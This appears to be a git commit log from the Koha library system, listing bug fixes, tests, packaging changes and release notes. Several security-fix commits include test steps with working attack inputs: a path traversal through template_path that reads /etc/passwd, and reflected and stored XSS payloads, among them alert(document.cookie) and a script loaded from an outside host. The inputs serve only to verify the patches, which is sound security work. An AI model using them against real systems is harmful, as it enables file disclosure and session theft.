1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
  Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  (You may have add more ..%2f or remove them to get the correct path)
  Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found

Repeat for the other script also

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14416: Stored XSS vulnerability - add biblio to shelf (intranet)

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14416: (follow-up) opac addbybilionumber

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14416 Stored XSS vulnerability

opac-addbybiblionumber.pl is also vulnerable because it doesn't escape
list names.

To test
1/ Create a malicious list name
2/ Try to add a biblio to the lists
3/ Notice js is excuted
4/ Apply patch
5/ Test again

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14418 : More XSS vulnerabilities in opac-shelves.pl

To test:
1/ Hit a url like
/cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
noes')</script> Where the id is a valid shelf id
2/ Notice the js is executed
3/ Apply patch
4/ Reload page
5/ Notice input is now escaped on display

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
Chromium. Patch fixes it.

Bug 14418 : XSS flaw in opac-shelves.pl

To test:
1/ Create a list and add at least one item to it
2/ Hit a url like http://192.168.2.18/cgi-bin/koha/opac-shelves.pl?viewshelf=7&sort=author&direction=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
Where the shelf id is the number of the list you created, notice the js is executed
3/ Apply the patch
4/ Reload the page notice the js is now escaped

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>

Bug 14418 XSS Vulnerabilities

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14360: Unescaped variable causes alert pop-up

To test:

1) Create a list in the OPAC, name it: <script>alert('Hello');</script>
2) Delete the list
3) Confirm deletion
4) See the alert say 'Hello'
5) Apply patch
6) Recreate list with same name
7) Delete list
8) Confirm deletion and alert no longer pops up

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14360: Unescaped variable causes alert

Adding |html to [% resultsperpage %] to escape the variable and get rid of the alert.

To test:

1) Go to URL such as ... /cgi-bin/koha/opac-authorities-home.pl?op=do_search&resultsperpage=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2) Notice pop-up box with alert
3) Apply patch, refresh page
4) Notice alert is gone

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bumping DB version for 3.16.11

Add release notes for 3.16.11

Translation updates for Koha 3.16.11 release

Bug 14068: fix preinst for fresh package installs

Signed-off-by: Mirko Tietgen <mirko@abunchofthings.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Works as expected. Tested both upgrading and on a new install.
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14055: remove symlink that breaks upgrades

Old versions of koha-common would put in a symlink to the system YUI
libraries. This causes upgrade problems, so we look out for that and zap
it if it's there.

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14006: about.pl checks the wrong zebra index mode

When setting zebra_bib_index_mode to grs1 I get two warnings when not applying the patch:

"The <zebra_bib_index_mode> entry is set to grs1. GRS-1 support is now deprecated and will be removed in future releases. Please use DOM instead by setting <zebra_bib_index_mode> to dom (full reindex required)."

"You have set <use_zebra_facets> but the <zebra_bib_index_mode> is not set to dom. Falling back to legacy facet calculation."

When applying the patch a third warning appears in addition to the two previous ones:

"The <zebra_bib_index_mode> entry is set to dom, but your system still appears to be set up for grs1 indexing."

Seems like the patch does what it should to me regarding the configuration mismatch warning.

Signed-off-by: Eivin Giske Skaaren <eskaaren@yahoo.no>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14075: Undefined value creates noisy warns in C4::AuthoritiesMarc

This match sets $sortby (previously undefined value) as an empty string to get rid of the warns.

To test:

1) Go to a URL such as http://localhost:8080/cgi-bin/koha/opac-authorities-home.pl?op=do_search&type=opac&operator=contains&value=a&marclist=any&and_or=and
2) Notice the warns in the error log
3) Apply patch
4) Reload URL
5) Notice page still works but no warns in error log

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
NOTE: I would have done $sortby //= '';
But this works too. :)

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14204: (QA followup) remove unneeded messages

TEST PLAN
---------
1) Apply first patch
2) prove -v t/db_dependent/Labels/t_Batch.t
-- YUCK! No meaningful messages on a lot of the ok's.
3) Apply this patch
4) prove -v t/db_dependent/Labels/t_Batch.t
-- YAY! Meaningful test results
5) koha qa test tools

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14204: Fix t/db_dependent/Labels/t_Batch.t failing test from Bug 12991

This patch updaes the batch_id variable after items are added to test batch

To test:
1. prove t/db_dependent/Labels/t_Batch.t and see two tests fail
2. apply patch
3. prove again, tests pass!

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
NOTE: The $batch->add_item() call to C4::Creators::Batch::add_item
triggers the change of the batch_id so this line is necessary!
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13109 - Serial failure for received and general viewing.

to test...

1/ attempt to view a subscription-detail that has a NULL value for either it's 'startdate' or 'enddate'

  an example url would be...
  http://koha-admin.foo.org/cgi-bin/koha/serials/subscription-detail.pl?subscriptionid=1

  observe error...
  'Date::Calc::PP::Delta_Days(): Usage: Date::Calc::Delta_Days($year1,$month1,$day1,$year2,$month2,$day2) at /your/koha/C4/Serials.pm line 2325'

2/ apply patch
3/ repeat step 1/
   observe that detail page displays OK

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
I confirm the issue if startdate is null (can exist with old data,
before the js check on the form).
Amended patch: Remove trailing space char and the link to the bz number
(can be found using git log).

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12445 [QA Followup] - Clear issues table before clearing borrrowers table

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
All tests pass, even more now than before.
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12445: ading unit tests to test the routines : CountSuggestion, ConnectSuggestionAndBiblio, SearchSuggestion, GetSuggestionInfo, DelSuggestion, GetSuggestionByStatus

These routines were not tested

Test plan:
1/ Execute the command : prove t/db_dependent/Suggestions.t
2/ The result has to be a success without error or warning :
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=89, 1 wallclock secs ( 0.05 usr 0.01 sys + 1.52 cusr 0.08 csys = 1.66 CPU)
Result: PASS

Signed-off-by: Paola Rossi <paola.rossi@cineca.it>
Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Test pass, no koha-qa errors

But now there are 91!
prove t/db_dependent/Suggestions.t
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=91, 2 wallclock secs ( 0.05 usr 0.00 sys + 1.77 cusr 0.10 csys = 1.92 CPU)
Result: PASS

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12445: Improving unit tests for C4::Suggestions.pm

Now, the tests used 'is' instead of 'ok', the tests are wrapped in a transaction, adding tests for the routines NewSuggestion, GetSuggestion, ModSuggestion, GetSuggestionFromBiblionumber and GetInfoFromBiblionumber.

The tests for the routines DelSuggestionsOlderThan, CountSuggestion, ConnectSuggestionAndBiblio, SearchSuggestion, GetSuggestionInfo, DelSuggestion and GetSuggestionByStatus will be arrived in another patch.

Test plan:
1/ Execute the command : prove t/db_dependent/Suggestions.t
2/ The result has to be a success without warning or error :
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=32, 2 wallclock secs ( 0.03 usr 0.01 sys + 1.49 cusr 0.08 csys = 1.61 CPU)
Result: PASS

Signed-off-by: Paola Rossi <paola.rossi@cineca.it>
Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13645: dependencies for libdbix-connector-perl

Bug 13645 [QA Followup] - Add DBIx::Connector to the list of dependancies

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>

Bug 13645: Use DBIx::Connector

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13645: Cache the DBIx connection

We don't want to recreate a new connection to the DB every time we want
a new schema.

This patch creates a $database package level variable on the same way
it's done in C4::Context for $dbh.

Signed-off-by: Jacek Ablewicz <abl@biblos.pk.edu.pl>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 7904: 3.16.x followup

revert failling verify_cksum() test

Signed-off-by: Mason James <mtj@kohaaloha.com>
modified: t/SIP_Sip.t

Bug 7904: (QA followup) fix tests

The package name for SIP wasn't fixed in the tests by the original patches.

This patch fixes it.

To test:
- Run
$ prove t/db_dependent/SIP_ILS.t
- Tests should pass with the patch.

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>

Bug 7904 Change SIP modules to use standard LIB path

For historical reasons the SIPServer and SIP modules
have used an extra module path in addition to the
standard Koha one. This has caused numerous irritants
in attempting to set up scripts and basic tests. It
does not help in attempting to modify or debug
this code

This patch changes the package value in the modules
under the C4/SIP directory and makes calls to
them use the full package name.

Where the export mechanism was being short circuited
routines have been explicitly exported and imported
declarations of 'use ILS' when that module was
not being used and which only generated warnings
have been removed.

As a lot of the changes affect lines where
an object is instantiated with new. The opportunity
has been taken to replace the ambiguous indirect
syntax with the preferred direct call

In intializing ILS the full path is added as this
will not require any changes to existing configs.
I suspect this feature is unused, and adds
obfuscation rather than flexibility but have kept
the feature as we need this change in order to
rationalize and extend the testing of the server.

The visible difference is that with the normal Koha
PERL5LIB setting. Compilation of Modules under C4/SIP
should be successful and not fail with unlocated modules,
allowing developers to see any perl warnings

All the SIP modules can now be run through the tests
in t/00-load.t now except for SIPServer itself

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 7904 - remove unnecessary path from SIP script

With the fixing of the namespace in the SIP code, we don't need to
modify the PERL5LIB to have the old one.

To test:
* do a package install using this and the other patches on bug 7904
* enable SIP
* make sure koha-start-sip and koha-stop-sip work

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13979: [3.16.x] updates to allow installation on jessie

This patch makes the build script keep the shipped YUI JavaScript library
instead of explicitly deleting it and using the one the operating system
provides.

Development is done against the YUI library we ship, so this makes sense
even if Debian still shipped it.

Signed-off-by: Josef Moravec <josef.moravec@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bumping version number for 3.16.10 release

Signed-off-by: Mason James <mtj@kohaaloha.com>

Release notes for 3.16.10

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12820 [QA Followup] - Tab and whitespace cleanup

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>

Bug 12820: Handle rental fees in Sip issue and renew

Implement correct handling of fees associated with checking out
an item.
This is associated with fee acknowledged field (BO)

To quote from the Sip2 document
" If this field is N in a Checkout message and there is a fee
associated with checking out the item, the ACS should tell the
SC in the Checkout Response that there is a fee, and refuse to
check out the item. If the SC and the patron then interact and the
patron agrees to pay the fee, this field will be set to Y on a second
Checkout message, indicating to the ACS that the patron has acknowledged
the fee and checkout of the item should not be refused just
because there is a fee associated with the item"

So there are two Checkout requests the first with BO not set to Y is
rejected but the fee amount is returned. The Second Checkout with BO set
to Y should succeed.

Added a debug log message indicating why we block a checkout
when we dont otherwise indicate

Signed-off-by: Brendan Gallagher <brendan@bywatersolutions.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>

Bug 13746: Add tests (follow-up)

increase tests to 48, so t/db_dependent/Serials.t passes clean

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13746: Add tests

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13746: On creating a new subscription, notes fields get confused

For every subscription we have 4 notes fields in Koha, 2 are in the
subscription itself and another 2 are in the subscription history.

When creating a new subscription, the notes fields from the
subscription get copied to the fields of the subscription history,
leading to doubled up display of notes in the OPAC.

To test:
- Add a new subscription without patch
  - check manual history
  - Fill in both notes fields
- Verify that the notes fields got also saved into the
  subscription history (easy from the Summary tab)
- Apply patch
- Add another subscription, like above
- Verify now only the subscription notes fields are saved
- Edit subscription and notes - verify all is ok
- Edit subscription history (Planning tab) - verify all is ok

Signed-off-by: Brendan Gallagher <brendan@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13744: Fix datatables paging on 'Holds to pull' report

The paging of the datatables on the 'holds to pull' report
page is broken without this patch.

To test:
- Make sure that some holds are placed on available items
in your installation
- Go to the circulation start page
- Open the 'holds to pull' report
- Verify that the patch fixes the paging on the result table

Also: Fixes "None" in the filter pull downs to be translatable.
Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13744: Fix datatables paging on 'checkout history' page

The paging in the datatable on the 'circulation history' page
is broken without this patch.

/cgi-bin/koha/catalogue/issuehistory.pl?biblionumber=...

To test:
- Search for a record with items that have been checked out
in the past
- From the detail page, open the 'checkout history' tab
- Check paging displays correctly with this patch and is
broken without

Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13744: Fix datatables paging on 'order from subscription' page

The paging of the datatable on the 'order from subscription' page
is broken without this patch.

To test:
- Make sure you have a subscription, note the vendor
- Create a new basket for this vendor
- Add a new order line 'from a subscription'
- Check paging on the result table displays correctly

Signed-off-by: Nicole <nicole@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 11331 - CSV export for viewlog.pl is missing newlines - followup

Perl formatting and cleaning.
Also corrects the HTML of results table in viewlog.tt.

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 11331 - CSV export for viewlog.pl is missing newlines

When you try to export the result of tools/viewlog.pl in csv, file
cannot be correctly loaded :
  - newline is missing after each record,
  - strings should be enclosed in ""
  - columns are not the same as for screen output

This patch corrects this by using like other export Text::CSV.
Adds a header line made with the keys of first data. For that, all data
values are initialiszed with empty string.

Test plan :
- Use a database with some logs, see sysprefs
  /cgi-bin/koha/admin/preferences.pl?tab=logs
- Go to export page /cgi-bin/koha/tools/viewlog.pl
- Select a module
- Click on "To a file" and choose a file name
- Click on "Submit"
- Open file
   => Without this patch : newline is missing, multi-lines cells are not
      enclosed in "", there are no column headings
   => Without this patch : each line is a data line, complexe cells are
      enclosed in "", there are column headings
- Test the export of all modules to see that all headings are necessary
- Check the output to screen in the browser

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
The CSV export is significantly improved. I question the usefulness of
including biblioitemnumber in the output. A better inclusion would be
itemnumber.

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
While this feature is still not perfect, this is a big improvement.
Passes tests and QA script, restores basic functionality.

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12122: TransferSlip should accept both itemnumber and barcode

Added small patch to allow barcode as input in TransferSlip routine, mostly
to allow generating transfer slips where only barcode is present (aka.
javascript).

Test plan:
1) find book with <barcode> and <itemnumber>
2) generate transferslips with both:
transfer-slip.pl?transferitem=<itemnumber>3967925&branchcode=MPL&op=slip
transfer-slip.pl?barcode=<barcode>&branchcode=MPL&op=slip
and verify that the generated slips match.

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Edit:
- Added tests in t/db_dependent/Circulation_transfers.t

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Passes tests and QA script.
Works with both itemnumber or barcode as described.
Tested printing transfer slips with the URL examples given
and in the UI.

Bug 13568 OAI Server doesn't handle properly resumption token

When responding to ListRecords and ListIdentifiers verbs, OAI server doesn't
return proper resumption token. At the end of a result set, OAI server
generates a resumption token even if there isn't anymore records. Consequently,
OAI harverster will send a new request, based on this invalid resumption,
token. OAI Server responds with an empty resultset, which is considered as an
invalid response by most of the harvesters.

TO TEST:

- Find in your DB, a day where a few biblio records have been created. The
  number of created biblios must inferior to OAI-PMH:MaxCount.

- Let say this day is 2014-01-09. Send an OAI-PMH request to Koha OAI Server:

  /cgi-bin/koha/oai.pl?verb=ListRecords&metadataPrefix=marcxml&from=2014-01-09&until=2014-01-09

- At the end of the result, you will see a resumption token which looks like that:

  <resumptionToken cursor="47">marcxml/47/2014-01-09/2014-01-09/</resumptionToken>

  This is wrong. No resumptiion token should be sent since there isn't anymore
  records to harvest.

- Apply the patch.

- Resend the OAI-PMH request. There is no resumption token at the end of the
  result.

- You could test also with ListIdenfiers verb in place of ListRecord.

Signed-off-by: Christophe Brocquet <christophe.brocquet@obspm.fr>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13636 - Staff search results item status incorrect for holds

Imagine this scenario: we have one record with four items. Two of those
items are checked out, one of those items is a waiting hold, and one of
those items is available. We would expect to see this on the search
results page. Instead, we will see both non-checked out items as
unavailable due to waiting holds.

This is due to a semantic issue GetReserveStatus.
C4::Search::searchResults uses GetReserveStatus to get the reserve
status of each item, but unlike all other calls to the sub, this one
passes in not only itemnumber, but biblionumber.

When no reserve is found for the available item, the subroutine uses the
biblionumber to grab what is essentially an arbitrary reserve to use for
the status. This makes no sense and this functionality should be
entirely removed from the subroutine so regressions like this will be
prevented in the future.

Test Plan:
1) Create one record with 4 items
   a) check two of the items out to patrons
   b) set one of the items as a waiting hold
   c) leave the fourth item as available
2) Run a search where this record will be in the results list
3) Note that the results list 2 items on loan, two unavailable
4) Apply this patch, reload the search results
5) Note that the results list 1 available, 2 on loan, 1 unavailable

Signed-off-by: John Andrews <jandrews@washoecounty.us>
Signed-off-by: Sheila Kearns <sheila.kearns@state.vt.us>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Note: This is for the staff search result list!

Works as expected.

Bug 13298 - Holds ratios report ignores ordered items

The holds ratio report ignores ordered items. This could cause a library
to inadvertently order more copies of a title than they actually need.
An option should be added to count ordered items ( i.e. any negative
notforloan value ).

Test Plan:
1) Apply this patch
2) Create a record with two items, one regular, one ordered.
3) Place 3 holds on the item
4) Run the reserve ratios report, by default you should see this record
5) Check the new 'include ordered' checkbox, rerun the report
6) Note that record is no longer displayed

Signed-off-by: Heather Braum <hbraum@nekls.org>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>

Bug 13270: Don't display "vendor note" label if nothing to display

Bug 12111 removes the vendor note edition on receiving.
The label should not be displayed when it's empty.

Test plan:
1/ Receive an order without a vendor note and verify that the label is not
displayed.
2/ Receive an order with a vendor note and verify that the note is
displayed.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Works as described, small template change.

Bug 13268: the size should not be emptied in pl script

It duplicates what the first patch does.

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>

Bug 13268 - biblioitems.size value not correctly displayed (more)

Bug partially corrected by Bug 11357.

The size column in biblioitems is a bit problematic when used in TT, because instead of the size value from the biblio column it will give you the size of the variable or current loop.

It's currently used in the templates like opac-topissues.tt :
[% IF results_loo.size %][% results_loo.size %][% END %]

This patch corrects by using item() TT method.
See http://stackoverflow.com/questions/2311303/how-can-i-handle-hash-keys-containing-illegal-identifier-characters-in-template.

Test plan :
- Be sure there is a mapping between a MARC field and biblioitems.size
- Create a record A with biblioitems.size defined : like "10x12"
- Create a record B with no value in biblioitems.size
- Check each modified page :
=> Without this patch : you see a number (loop size) for both records
=> With this patch : you only see the correct value for A and nothing for B

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>